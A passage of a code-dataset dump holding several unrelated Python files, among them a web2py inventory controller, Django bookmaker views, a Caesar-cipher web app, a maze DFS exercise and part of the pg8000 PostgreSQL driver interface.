de categoria de articulos\n mystep = [dict(title='NUEVAS CATEGORIAS',Legend='Ingrese una Categoria para Agrupar artículos',fields=['name'])]\n from plugin_PowerFormWizard import PowerFormWizard\n options = {'description':False,'legend':True,'validate':True}\n form = PowerFormWizard(db.categoria, steps=mystep, options=options)\n \n if form.accepts(request.vars, session):\n response.flash = \"registro aceptado\"\n elif form.errors:\n form.step_validation()\n response.flash = \"error en los datos\"\n return dict( table=powerTable.create(),form=form)\n\n@auth.requires_login()\ndef articulo():\n \n # presentacion de tabla de articulos ############ \n datasource = db(db.articulo.id>0).select()\n powerTable = plugins.powerTable\n powerTable.datasource = datasource\n powerTable.headers = 'labels'\n powerTable.showkeycolumn = False\n powerTable.dtfeatures['bJQueryUI'] = request.vars.get('jqueryui',True)\n powerTable.uitheme = request.vars.get('theme','Smoothness')\n powerTable.dtfeatures[\"sScrollY\"] = \"100%\"\n powerTable.dtfeatures[\"sScrollX\"] = \"100%\"\n powerTable.dtfeatures['sPaginationType'] = 'full_numbers'\n powerTable.dtfeatures[\"iDisplayLength\"] = 10\n powerTable.extrajs = dict(autoresize={},\n tooltip={},\n details={'detailscolumns':'articulo.memo'}\n )\n powerTable.keycolumn = 'articulo.id'\n powerTable.columns = ['articulo.descripcion','articulo.link',\n 'articulo.precio','articulo.categoria']\n # alta de articulos #################### \n mystep = [dict(title='NUEVOS ARTICULOS',Legend='Ingrese los datos del articulo',\n 
fields=['descripcion','memo','iva','precio','categoria'])]\n from plugin_PowerFormWizard import PowerFormWizard\n options = {'description':False,'legend':True,'validate':True}\n form = PowerFormWizard(db.articulo, steps=mystep, options=options)\n \n if form.accepts(request.vars, session):\n response.flash = \"registro aceptado\"\n elif form.errors:\n form.step_validation()\n response.flash = \"error en los datos\"\n return dict( table=powerTable.create(),form=form)\n\n\ndef features():\n from plugin_PowerGrid.CallBack import CallBack\n if (auth.has_membership(role='Admin')): \n return CallBack(db.movimientos.id>0 and (db.movimientos.fecha_devuelta==None or \n db.movimientos.estado == \"Parte En Poder de Técnico\"))\n elif (auth.has_membership(role='control')):\n return CallBack(db.movimientos.fecha_devuelta!=None and \n db.movimientos.estado != \"Parte En Poder de Técnico\")\n elif (auth.has_membership(role='usuario')):\n return CallBack(db.movimientos.fecha_devuelta==None or \n db.movimientos.estado == \"Parte En Poder de Técnico\")\n\n@auth.requires_login()\ndef presupuestos():\n \n \n from plugin_PowerGrid.PowerGrid import PowerGrid\n p = PowerGrid(\n callback=URL('default','features', extension='json'),\n buttons=[\n ##('details',URL('plugin_PowerGrid','data',args=['read','products'])+'/${id}','_blank','Details of Record ${id}','modal positive left button','magnifier',[600,500]),\n ('cargar comprobante',URL('plugin_PowerGrid','data',args=['update','movimientos'])+'/${id}','_blank','Editando Registro ${id}','refreshmodal middle button', 'pen',[600,800]),\n ##('delete',URL('plugin_PowerGrid','data',args=['delete','products'])+'/${id}','_blank','Are you sure you want to delete record ${id}','confirmationmodal right negative button', 'cross'),\n \n ],\n addurl=URL('plugin_PowerGrid','data',args=['create','movimientos']), \n addLabel='Add New Record', \n addTitle='You are adding a new record', \n headers=[['id','Codigo'],['entregado_x','Entrega: '], ['retirado_x','Retira'],\n ],\n \n #headers=[['entregado_x','Entrega: '], ['retirado_x','Retira'], ['id_articulo','Articulo'],['cantidad','Cantidad'],\n #['cliente','Usado en']],\n #hidecontrolbuttons=True,\n #hiderefreshbutton=True,\n hideaddbutton=True,\n #_id=\"banana\",\n #target=\"melancia\",\n #searchBy='equal',\n minH=800,\n options=dict(#colsWidth=[60,60,60],\n #width=700,\n #buttonBackTitle='Back',\n #buttonMax=4,\n #buttonNextTitle='Next',\n #success=\"\"\"js[function(){alert('Executed on success');}]js\"\"\",\n #before=\"\"\"js[function(){alert('Executed before');}]js\"\"\",\n #error=\"\"\"js[function(){alert('Executed on load error');}]js\"\"\",\n #buttonOption=False,\n #buttonsWidth=200\n #buttonTitle='oi',\n #clickFx=False,\n #debug=True,\n #find='name',search='J',\n #searchOption=False,\n searchButtonLabel='Buscar',\n searchButtonTitle='Clique para buscar',\n searchFocus=True,\n #cache=True,\n #contentType='application/x-www-form-urlencoded; charset=utf-8',\n #type='get',\n #dataType='jsonp',\n #jsonp=True,\n #jsonpCallback='callback',\n #findsName=[['name','name']],\n #hoverFx=False,\n #loadingOption=True,\n #loadingText='Carregando...',\n #messageOption=False,\n #noResultOption=False,\n noResultText='no se encontraron datos ',\n #page=1,\n #rows=3,\n #rowsNumber=[3,25],\n #params='&blablabla=45',\n #resize=False,\n #resultOption=False,\n #resultText= 'Exibindo {from} - {to} de {total} registros',\n #scroll=True,height=100,\n #searchText='Busque aqui',\n #sortName='name',\n #sortOrder='asc',\n #template='template',\n 
#templateStyle='blabla',\n\n\n\n ),\n )\n\n return dict(p=p)\n\n@auth.requires_login()\ndef presupuestos2():\n \n class Virtual(object):\n @virtualsettings(label=T('Informacion: '))\n def virtualtooltip(self):\n return T('se retiro para <strong>%s</strong>, en concepto de <strong>%s</strong><br>' %\n (self.cliente.empresa,self.movimientos.concepto))\n \n datasource = db(db.movimientos.cliente==db.cliente.id).select() \n powerTable = plugins.powerTable\n powerTable.datasource = datasource\n powerTable.virtualfields = Virtual()\n powerTable.headers = 'labels'\n powerTable.showkeycolumn = True\n powerTable.dtfeatures['bJQueryUI'] = request.vars.get('jqueryui',True)\n powerTable.uitheme = request.vars.get('theme','Smoothness')\n powerTable.dtfeatures['sScrollX'] = '100%'\n powerTable.dtfeatures['sPaginationType'] = request.vars.get('pager','scrolling')\n powerTable.extrajs = dict(autoresize={},\n tooltip={},\n )\n powerTable.columns = ['movimientos.id',\n 'movimientos.entregado_x',\n 'movimientos.retirado_x',\n 'movimientos.id_articulo',\n 'movimientos.cantidad',\n 'movimientos.Comprobante',\n 'movimientos.fecha_pedido',\n 'movimientos.fecha_devuelta'\n ]\n return dict(table=powerTable.create())\n\n@auth.requires(auth.has_membership(role='Admin')) \ndef movimientos():\n \n mystep = [dict(title='MOVIMIENTOS',Legend='Ingrese los datos solicitados',\n fields=['entregado_x','retirado_x','id_articulo','cantidad',\n 'estado','Comprobante',\n 'cliente','concepto'])]\n from plugin_PowerFormWizard import PowerFormWizard\n options = {'description':False,'legend':True,'validate':True}\n form = PowerFormWizard(db.movimientos, steps=mystep, options=options)\n \n if form.accepts(request.vars, session):\n response.flash = \"registro aceptado\"\n rows = db(db.movimientos.id>0).select()\n last_row = rows.last()\n a=db.memomovi.insert(referencia=last_row.id,entregado_x=last_row.entregado_x,\n retirado_x=last_row.retirado_x,id_articulo=last_row.id_articulo,\n cantidad=last_row.cantidad,fecha_pedido=last_row.fecha_pedido,\n fecha_devuelta=last_row.fecha_devuelta,estado=last_row.estado,\n Comprobante=last_row.Comprobante,cliente=last_row.cliente,\n concepto=last_row.concepto)\n #db.commit()\n elif form.errors:\n form.step_validation()\n response.flash = \"error en los datos\"\n return dict(form=form)\n\n","sub_path":"controllers/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":12494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"122599383","text":"from pymongo.objectid import ObjectId\nfrom pymongo import DESCENDING, ASCENDING\n\nfrom gumshoe.core.utils import _db, _db_auth, _error\n\nimport time\n\nclass Activity():\n\n def __init__(self):\n self.db = _db()\n # all good\n True\n\n###########################\n# Private API methods\n###########################\n def user(self, user):\n db = _db_auth(self.db)\n\n if user:\n activities = db.activities.find({'_user_id':user['_id']}).sort('created_on',DESCENDING).limit(10)\n\n payload = {\n 'activity':self.parseActivities(activities)\n }\n payload['status'] = 'success'\n \n else:\n payload = _error('Could not find requested User')\n \n return payload\n \n###########################\n# Helpers\n###########################\n\n def parseActivities(self, activities):\n cleaned_activities = []\n db = _db_auth(self.db)\n \n for activity in activities:\n activity_obj = {\n 'created_on': int(time.mktime(activity['created_on'].timetuple())),\n 'action': activity['action']\n }\n \n # Completed 
mystery\n if activity['action'] == 'c_m':\n try:\n activity_obj['mystery_title'] = activity['mystery_title']\n activity_obj['user_mystery_id'] = str(activity['_user_mystery_id'])\n activity_obj['cash'] = activity['cash']\n activity_obj['points'] = activity['points']\n activity_obj['type'] = activity['mystery_type']\n except:\n user_mystery = db.user_mysteries.find_one(activity['_user_mystery_id'])\n try:\n activity_obj['mystery_title'] = user_mystery['title']\n activity_obj['user_mystery_id'] = str(user_mystery['_id'])\n activity_obj['cash'] = user_mystery['cash']\n activity_obj['pints'] = user_mystery['points']\n activity_obj['mystery_type'] = False\n # TODO - mystery type\n except:\n activity_obj = False\n\n # Started mystery\n elif activity['action'] == 's_m':\n try:\n activity_obj['mystery_title'] = activity['mystery_title']\n activity_obj['user_mystery_id'] = str(activity['_user_mystery_id'])\n activity_obj['type'] = activity['mystery_type']\n except:\n user_mystery = db.user_mysteries.find_one(activity['_user_mystery_id'])\n try:\n activity_obj['mystery_title'] = user_mystery['title']\n activity_obj['user_mystery_id'] = str(user_mystery['_id'])\n activity_obj['mystery_type'] = False\n # TODO - mystery type\n except:\n activity_obj = False\n\n # Earned award\n elif activity['action'] == 'e_a':\n #print activity\n try:\n activity_obj['mystery_title'] = activity['mystery_title']\n activity_obj['user_mystery_id'] = str(activity['_user_mystery_id'])\n activity_obj['_award_id'] = str(activity['_award_id'])\n activity_obj['award_id'] = activity['award_id']\n activity_obj['award_name'] = activity['award_name']\n activity_obj['award_text'] = activity['award_text']\n except:\n activity_obj = False\n\n\n \n else:\n activity_obj = False\n\n if activity_obj:\n cleaned_activities.append(activity_obj)\n \n return cleaned_activities","sub_path":"gumshoe/core/classes/activity.py","file_name":"activity.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"336512899","text":"import re\n\n# this is so ugly it's embarrassing ;-)\n\ndef intersect(a1,a2,b1,b2):\n v = max(a1,b1)\n w = min(a2,b2)\n if v <= w:\n return (v, w)\n return None\n\ndef intersect3(x1,x2,y1,y2,z1,z2,x3,x4,y3,y4,z3,z4):\n u = intersect(x1,x2,x3,x4)\n v = intersect(y1,y2,y3,y4)\n w = intersect(z1,z2,z3,z4)\n if u and v and w:\n return u[0],u[1],v[0],v[1],w[0],w[1]\n return None\n\ndef vol(x1,x2,y1,y2,z1,z2):\n u = abs(x1-x2)+1\n v = abs(y1-y2)+1\n w = abs(z1-z2)+1\n return u*v*w\n\nr = re.compile(r\"(on|off) x=([-0-9]+)..([-0-9]+),y=([-0-9]+)..([-0-9]+),z=([-0-9]+)..([-0-9]+)\")\n\nwith open(\"input.txt\", mode=\"r\") as f:\n a = f.readlines()\n\nl = list(map(lambda m: (m.group(1)==\"on\", *[int(m.group(k)) for k in range(2, 8)]), [ r.match(x) for x in a ]))\n\non = []\noff = []\noncount = 0\n\nfor c in l:\n newon = []\n newoff = []\n if c[0]:\n # turn ON\n newon.append((c[1],c[2],c[3],c[4],c[5],c[6]))\n oncount += vol(c[1],c[2],c[3],c[4],c[5],c[6])\n for oc in on:\n i = intersect3(c[1],c[2],c[3],c[4],c[5],c[6], oc[0],oc[1],oc[2],oc[3],oc[4],oc[5])\n if i:\n oncount -= vol(i[0],i[1],i[2],i[3],i[4],i[5])\n newoff.append(i)\n for oc in off:\n i = intersect3(c[1],c[2],c[3],c[4],c[5],c[6], oc[0],oc[1],oc[2],oc[3],oc[4],oc[5])\n if i:\n oncount += vol(i[0],i[1],i[2],i[3],i[4],i[5])\n newon.append(i)\n on = on + newon\n off = off + 
newoff\n\nprint(oncount)\n","sub_path":"2021/22/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"589016521","text":"import argparse \ndef parse_args(): \n parser=argparse.ArgumentParser()\n parser.add_argument(\"--histograms\",nargs=\"+\")\n parser.add_argument(\"--categories\",nargs=\"+\") \n parser.add_argument(\"--outf\") \n return parser.parse_args() \ndef main():\n args=parse_args() \n outf=open(args.outf,'w') \n outf.write('Value'+'\\t'+'\\t'.join(args.categories)+'\\n')\n val_dict=dict() \n for index in range(len(args.histograms)): \n f=args.histograms[index] \n cur_category=args.categories[index] \n data=open(f,'r').read().strip().split('\\n') \n for line in data: \n tokens=line.split('\\t') \n cur_val=tokens[0] \n if cur_val not in val_dict: \n val_dict[cur_val]=dict() \n val_dict[cur_val][cur_category]=tokens[1] \n #write output file \n for cur_val in val_dict: \n outf.write(cur_val) \n for cur_category in args.categories: \n if cur_category in val_dict[cur_val]: \n outf.write('\\t'+val_dict[cur_val][cur_category])\n else: \n outf.write('\\t0') \n outf.write('\\n') \n \nif __name__==\"__main__\": \n main() \n\n","sub_path":"anna_code/datasets_paper/figure3/merge_metrics.py","file_name":"merge_metrics.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"259087886","text":"import string\n\n# minimum number of steps\n# minStep\n\ndef init():\n '''\n Depth-first search\n maze path finding\n '''\n print('Enter the maze, 0 for empty, 1 for an obstacle; finish with an empty line')\n mazeArr=[]\n while True:\n line=input()\n if line=='':\n break\n else:\n mazeArr.append(line.split(\" \"))\n startCoord=input('Enter the start coordinate: ')\n startCoord=startCoord.split(\" \")\n targetCoord=input('Enter the target coordinate: ')\n targetCoord=targetCoord.split(\" \")\n print(startCoord)\n print(targetCoord)\n arrATOI(mazeArr)\n arrATOI(startCoord)\n arrATOI(targetCoord)\n print(mazeArr)\n global minStep\n minStep=len(mazeArr)*len(mazeArr[0])\n\n recordCoords = list(mazeArr)\n # NOTE: overwritten with a hardcoded 3x3 visited map; the generic initialisation is commented out below\n recordCoords=[[1,0,0],[0,0,0],[0,0,0]]\n # for i in len(recordCoords):\n # for j in len(recordCoords[i]):\n # recordCoords[i][j]=0\n # recordCoords[startCoord[0]][startCoord[1]]=1\n print(recordCoords)\n\n # recordCoords=[len(mazeArr)][len(mazeArr[0])]\n # recordCoords=[[]]*len(mazeArr)\n # for i in range(len(mazeArr)):\n # recordCoords[i]=[0]*len(mazeArr[0])\n # # for i in range(len(mazeArr)):\n # # # recordCoords[i]=[]\n # # for j in range(len(mazeArr[0])):\n # # recordCoords[i][j]=0\n # recordCoords[startCoord[0]][startCoord[1]]=1\n\n dfs(mazeArr,0,startCoord,targetCoord,recordCoords)\n print(\"The minimum number of steps is:\")\n print(minStep)\n\n# convert a (nested) array of strings to integers\ndef arrATOI(arr):\n for i in range(len(arr)):\n if isinstance(arr[i],list):\n arrATOI(arr[i])\n else:\n # arr[i]=string.atoi(arr[i])\n arr[i]=int(arr[i])\n\nnextStep=[[0,-1],[1,0],[0,1],[-1,0]]\n\n\ndef dfs(mazeArr,step ,startCoord,targetCoord,recordCoords,currentStep=0,currentCoord=-1):\n\n # minStep is read below before it is assigned, so the global declaration must come first\n global minStep\n shangbian=0\n xiabian=len(mazeArr)-1\n zuobian=0\n youbian=len(mazeArr[0])-1\n if currentCoord == -1:\n currentCoord=[startCoord[0],startCoord[1]]\n\n print(currentCoord[0])\n print(currentCoord[1])\n print(currentStep)\n for i in range(4):\n if i == 0:\n # up\n currentCoord[0]=startCoord[0]+nextStep[0][0]\n currentCoord[1]=startCoord[1]+nextStep[0][1]\n elif i == 1:\n # right\n currentCoord[0]=startCoord[0]+nextStep[1][0]\n currentCoord[1]=startCoord[1]+nextStep[1][1]\n elif i == 2:\n # down\n
currentCoord[0]=startCoord[0]+nextStep[2][0]\n currentCoord[1]=startCoord[1]+nextStep[2][1]\n else:\n # left\n currentCoord[0]=startCoord[0]+nextStep[3][0]\n currentCoord[1]=startCoord[1]+nextStep[3][1]\n\n # first check whether the target position has been reached\n if currentCoord[0]==targetCoord[0] and currentCoord[1]==targetCoord[1]:\n # reached the target position\n currentStep+=1\n if currentStep<minStep:\n minStep=currentStep\n print(\"Found a path with step count:\")\n print(currentStep)\n print(recordCoords)\n return\n else:\n if currentCoord[0]<zuobian or currentCoord[0]>youbian or currentCoord[1]<shangbian or currentCoord[1]>xiabian:\n # out of bounds\n # dfs(mazeArr,0,currentCoord,targetCoord,currentStep,currentCoord)\n # return\n pass\n else:\n if recordCoords[currentCoord[0]][currentCoord[1]] == 0:\n if mazeArr[currentCoord[0]][currentCoord[1]] == 1:\n # obstacle\n # dfs(mazeArr,0,currentCoord,targetCoord,currentStep,currentCoord)\n # return\n pass\n else:\n currentStep+=1\n recordCoords[currentCoord[0]][currentCoord[1]] = 1\n dfs(mazeArr,0,[currentCoord[0],currentCoord[1]],targetCoord,recordCoords,currentStep,[currentCoord[0],currentCoord[1]])\n recordCoords[currentCoord[0]][currentCoord[1]] = 0\n\n\n\n\ninit()\n","sub_path":"basic/python/dfs/dfs2.py","file_name":"dfs2.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"52073056","text":"from django.shortcuts import render_to_response, get_object_or_404\nfrom django.template import RequestContext\nfrom django.http import HttpResponse\nfrom django.db.models import Avg\nfrom comments.forms import BookmakerCommentForm\nfrom comments.models import BookmakerComments, BookmakerCommentLike\nfrom user_profile.models import UserProfile\nfrom models import BookmakerProfile, BookmakerRate\nfrom forms import BookmakerRateForm\n\n\ndef get_all_bookmakers(request):\n bookmakers = BookmakerProfile.objects.annotate(rate=Avg('bookmakerrate__value')).all().order_by(\n Avg('bookmakerrate__value').desc())\n for bookmaker in bookmakers:\n if bookmaker.rate is None:\n bookmaker.rate = '-'\n return render_to_response('all_bookmakers.html', {'bookmakers': bookmakers},\n context_instance=RequestContext(request))\n\n\ndef get_bookmaker(request, id):\n bookmaker = get_object_or_404(BookmakerProfile.objects.annotate(rate=Avg('bookmakerrate__value')), id=id)\n if bookmaker.rate is None:\n bookmaker.rate = '-'\n if request.POST:\n form = BookmakerCommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.user = UserProfile.objects.get(user_id=request.user.id)\n comment.bookmaker_id = bookmaker\n comment.save()\n return render_to_response('comment_template.html', {'comment': comment, 'type': 'bookmaker'},\n context_instance=RequestContext(request))\n else:\n return HttpResponse('', status=400)\n comments = BookmakerComments.objects.filter(bookmaker_id=bookmaker)\n form = BookmakerCommentForm()\n rate_form = BookmakerRateForm()\n return render_to_response('bookmaker_description.html',\n {'bookmaker': bookmaker, 'form': form, 'rate_form': rate_form,\n 'bookmaker_id': id, 'comments': comments, 'type': 'bookmaker'},\n context_instance=RequestContext(request))\n\n\ndef like_comment(request, comment_id, value):\n try:\n value = int(value)\n comment_id = int(comment_id)\n if value in [1, -1]:\n user = UserProfile.objects.get(user_id=request.user.id)\n like = BookmakerCommentLike.objects.filter(user=user, comment_id=comment_id)\n if not like:\n comment = BookmakerComments.objects.get(id=comment_id)\n like = 
BookmakerCommentLike.objects.create(user=user, comment_id=comment, value=value)\n like.save()\n comment.likes += value\n comment.save()\n return HttpResponse('', status=200)\n else:\n return HttpResponse('You can post only one like', status=400)\n else:\n return HttpResponse('You can post only one like', status=400)\n except ValueError:\n return HttpResponse('You can post only one like', status=400)\n\n\ndef rate_bookmaker(request, bookmaker_id):\n try:\n bookmaker_id = int(bookmaker_id)\n if request.POST:\n form = BookmakerRateForm(request.POST)\n if form.is_valid():\n user = UserProfile.objects.get(user_id=request.user.id)\n bookmaker = BookmakerProfile.objects.get(id=bookmaker_id)\n rate = BookmakerRate.objects.filter(user=user, bookmaker_id=bookmaker)\n if not rate:\n rate = form.save(commit=False)\n rate.user = user\n rate.bookmaker_id = bookmaker\n rate.save()\n return HttpResponse('Thank you for your vote', status=200)\n else:\n return HttpResponse('You already voting', status=400)\n else:\n return HttpResponse('Select correct value', status=400)\n except ValueError:\n return HttpResponse('Wrong bookmaker id', status=400)\n","sub_path":"bookmakers_profile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"119959994","text":"import sys, os\nsys.path.insert(0, os.path.realpath(os.path.join(os.path.abspath(os.path.dirname(__file__)), '..')))\n\nimport json\n\nfrom flask import Flask, Response, request, render_template\n\nfrom stockviewer.view import viewmanager\nfrom stockviewer.utils import parse_config\n\nimport stockviewer.settings\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n\treturn render_template('index.html')\n\n@app.route('/view')\ndef view():\n\tsymbol = request.args.get('symbol')\n\tbegin = request.args.get('begin')\n\tend = request.args.get('end')\n\n\tconfig = parse_config(stockviewer.settings.files['config'])\n\n\tvm = viewmanager(config.find('viewmanager'))\n\tresponse = vm.view(symbol, begin, end)\n\n\treturn Response(json.dumps(response), mimetype='application/json')\n\nif __name__ == '__main__':\n\tapp.run(debug=True)\n","sub_path":"stockviewer/service/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"34452646","text":"import webapp2\nimport cgi\nfrom caesar import encrypt\n\n# Provide html for retrieving string and rotatation number from user\nform=\"\"\"\n<!DOCTYPE html>\n<html>\n<head>\n\t<title>Caesar\n \n\n\n
\n
\n \n
\n

Enter your text to Encrypt:

\n \n \n
\n\n\n\"\"\"\n\nclass MainHandler(webapp2.RequestHandler):\n\n def write_form(self, text_to_encrypt=\"\", rotate_number=\"\"):\n self.response.out.write(form % { \"text_to_encrypt\": text_to_encrypt,\n\t\t\t\t\t\t\t\t\t\t \"rotate_number\": rotate_number } )\n\n def get(self):\n self.write_form()\n\n def post(self):\n original_text = self.request.get(\"text_to_encrypt\")\n text_to_send = cgi.escape(original_text, quote=True)\n rotate_number = self.request.get(\"rotate_number\")\n #Call function to rotate text\n rotated_text = encrypt( text_to_send, int(rotate_number) )\n #Write back out the rotated text\n self.write_form( rotated_text, rotate_number )\n\napp = webapp2.WSGIApplication([('/', MainHandler)], debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"226345149","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/mdipierro/make_web2py/web2py/gluon/contrib/pg8000/interface.py\n# Compiled at: 2013-10-14 11:16:24\n__author__ = 'Mathieu Fenniak'\nimport socket, protocol, threading\nfrom errors import *\n\ndef conninfo_parse(conninfo):\n \"\"\"Conninfo parser routine based on libpq conninfo_parse\"\"\"\n options = {}\n buf = conninfo + ' '\n tmp = pname = ''\n quoted_string = False\n cp = 0\n while cp < len(buf):\n c = buf[cp]\n if c.isspace() and tmp and not quoted_string and pname:\n options[pname] = tmp\n tmp = pname = ''\n elif c == \"'\":\n quoted_string = not quoted_string\n elif c == '\\\\':\n cp += 1\n tmp += buf[cp]\n elif c == '=':\n if not tmp:\n raise RuntimeError('missing parameter name (conninfo:%s)' % cp)\n pname = tmp\n tmp = ''\n elif not c.isspace() or quoted_string:\n tmp += c\n cp += 1\n\n if quoted_string:\n raise RuntimeError('unterminated quoted string (conninfo:%s)' % cp)\n return options\n\n\nclass DataIterator(object):\n\n def __init__(self, obj, func):\n self.obj = obj\n self.func = func\n\n def __iter__(self):\n return self\n\n def next(self):\n retval = self.func(self.obj)\n if retval == None:\n raise StopIteration()\n return retval\n\n\nstatement_number_lock = threading.Lock()\nstatement_number = 0\n\nclass PreparedStatement(object):\n row_cache_size = 100\n\n def __init__(self, connection, statement, *types, **kwargs):\n global statement_number\n if connection == None or connection.c == None:\n raise InterfaceError('connection not provided')\n try:\n statement_number_lock.acquire()\n self._statement_number = statement_number\n statement_number += 1\n finally:\n statement_number_lock.release()\n\n self.c = connection.c\n self._portal_name = None\n self._statement_name = kwargs.get('statement_name', 'pg8000_statement_%s' % self._statement_number)\n self._row_desc = None\n self._cached_rows = []\n self._ongoing_row_count = 0\n self._command_complete = True\n self._parse_row_desc = self.c.parse(self._statement_name, statement, types)\n self._lock = threading.RLock()\n return\n\n def close(self):\n if self._statement_name != '':\n self.c.close_statement(self._statement_name)\n if self._portal_name != None:\n self.c.close_portal(self._portal_name)\n self._portal_name = None\n return\n\n row_description = property(lambda self: self._getRowDescription())\n\n def _getRowDescription(self):\n if self._row_desc == None:\n return\n else:\n return self._row_desc.fields\n\n def execute(self, *args, 
**kwargs):\n self._lock.acquire()\n try:\n if not self._command_complete:\n self._cached_rows = []\n self._ongoing_row_count = 0\n if self._portal_name != None:\n self.c.close_portal(self._portal_name)\n self._command_complete = False\n self._portal_name = 'pg8000_portal_%s' % self._statement_number\n self._row_desc, cmd = self.c.bind(self._portal_name, self._statement_name, args, self._parse_row_desc, kwargs.get('stream'))\n if self._row_desc:\n self._fill_cache()\n else:\n self._command_complete = True\n self._ongoing_row_count = -1\n if cmd != None and cmd.rows != None:\n self._ongoing_row_count = cmd.rows\n finally:\n self._lock.release()\n\n return\n\n def _fill_cache(self):\n self._lock.acquire()\n try:\n if self._cached_rows:\n raise InternalError(\"attempt to fill cache that isn't empty\")\n end_of_data, rows = self.c.fetch_rows(self._portal_name, self.row_cache_size, self._row_desc)\n self._cached_rows = rows\n if end_of_data:\n self._command_complete = True\n finally:\n self._lock.release()\n\n def _fetch(self):\n if not self._row_desc:\n raise ProgrammingError('no result set')\n self._lock.acquire()\n try:\n if not self._cached_rows:\n if self._command_complete:\n return\n self._fill_cache()\n if self._command_complete and not self._cached_rows:\n return\n row = self._cached_rows.pop(0)\n self._ongoing_row_count += 1\n return tuple(row)\n finally:\n self._lock.release()\n\n return\n\n row_count = property(lambda self: self._get_row_count())\n\n def _get_row_count(self):\n self._lock.acquire()\n try:\n if not self._command_complete:\n end_of_data, rows = self.c.fetch_rows(self._portal_name, 0, self._row_desc)\n self._cached_rows += rows\n if end_of_data:\n self._command_complete = True\n else:\n raise InternalError('fetch_rows(0) did not hit end of data')\n return self._ongoing_row_count + len(self._cached_rows)\n finally:\n self._lock.release()\n\n def read_dict(self):\n row = self._fetch()\n if row == None:\n return row\n else:\n retval = {}\n for i in range(len(self._row_desc.fields)):\n col_name = self._row_desc.fields[i]['name']\n if retval.has_key(col_name):\n raise InterfaceError('cannot return dict of row when two columns have the same name (%r)' % (col_name,))\n retval[col_name] = row[i]\n\n return retval\n\n def read_tuple(self):\n return self._fetch()\n\n def iterate_tuple(self):\n return DataIterator(self, PreparedStatement.read_tuple)\n\n def iterate_dict(self):\n return DataIterator(self, PreparedStatement.read_dict)\n\n\nclass SimpleStatement(PreparedStatement):\n \"\"\"Internal wrapper to Simple Query protocol emulating a PreparedStatement\"\"\"\n row_cache_size = None\n\n def __init__(self, connection, statement):\n if connection == None or connection.c == None:\n raise InterfaceError('connection not provided')\n self.c = connection.c\n self._row_desc = None\n self._cached_rows = []\n self._ongoing_row_count = -1\n self._command_complete = True\n self.statement = statement\n self._lock = threading.RLock()\n return\n\n def close(self):\n pass\n\n def execute(self, *args, **kwargs):\n \"\"\"Run the SQL simple query stataments\"\"\"\n self._lock.acquire()\n try:\n self._row_desc, cmd_complete, self._cached_rows = self.c.send_simple_query(self.statement, kwargs.get('stream'))\n self._command_complete = True\n self._ongoing_row_count = -1\n if cmd_complete is not None and cmd_complete.rows is not None:\n self._ongoing_row_count = cmd_complete.rows\n finally:\n self._lock.release()\n\n return\n\n def _fill_cache(self):\n pass\n\n def _fetch(self):\n if not 
self._row_desc:\n raise ProgrammingError('no result set')\n self._lock.acquire()\n try:\n if not self._cached_rows:\n return\n else:\n row = self._cached_rows.pop(0)\n return tuple(row)\n\n finally:\n self._lock.release()\n\n return\n\n def _get_row_count(self):\n return self._ongoing_row_count\n\n\nclass Cursor(object):\n\n def __init__(self, connection):\n self.connection = connection\n self._stmt = None\n return\n\n def require_stmt(func):\n\n def retval(self, *args, **kwargs):\n if self._stmt == None:\n raise ProgrammingError('attempting to use unexecuted cursor')\n return func(self, *args, **kwargs)\n\n return retval\n\n row_description = property(lambda self: self._getRowDescription())\n\n def _getRowDescription(self):\n if self._stmt == None:\n return\n else:\n return self._stmt.row_description\n\n def execute(self, query, *args, **kwargs):\n if self.connection.is_closed:\n raise ConnectionClosedError()\n self.connection._unnamed_prepared_statement_lock.acquire()\n try:\n if kwargs.get('simple_query'):\n self._stmt = SimpleStatement(self.connection, query)\n else:\n self._stmt = PreparedStatement(self.connection, query, statement_name='', *[ {'type': type(x), 'value': x} for x in args ])\n self._stmt.execute(*args, **kwargs)\n finally:\n self.connection._unnamed_prepared_statement_lock.release()\n\n row_count = property(lambda self: self._get_row_count())\n\n @require_stmt\n def _get_row_count(self):\n return self._stmt.row_count\n\n @require_stmt\n def read_dict(self):\n return self._stmt.read_dict()\n\n @require_stmt\n def read_tuple(self):\n return self._stmt.read_tuple()\n\n @require_stmt\n def iterate_tuple(self):\n return self._stmt.iterate_tuple()\n\n @require_stmt\n def iterate_dict(self):\n return self._stmt.iterate_dict()\n\n def close(self):\n if self._stmt != None:\n self._stmt.close()\n self._stmt = None\n return\n\n def fileno(self):\n return self.connection.fileno()\n\n def isready(self):\n return self.connection.isready()\n\n\nclass Connection(Cursor):\n\n def __init__(self, dsn='', user=None, host=None, unix_sock=None, port=5432, database=None, password=None, socket_timeout=60, ssl=False):\n self._row_desc = None\n if dsn:\n opts = conninfo_parse(dsn)\n database = opts.get('dbname', database)\n user = opts.get('user', user)\n password = opts.get('password', user)\n host = opts.get('host', host)\n port = int(opts.get('port', port))\n ssl = opts.get('sslmode', 'disable') != 'disable'\n try:\n self.c = protocol.Connection(unix_sock=unix_sock, host=host, port=port, socket_timeout=socket_timeout, 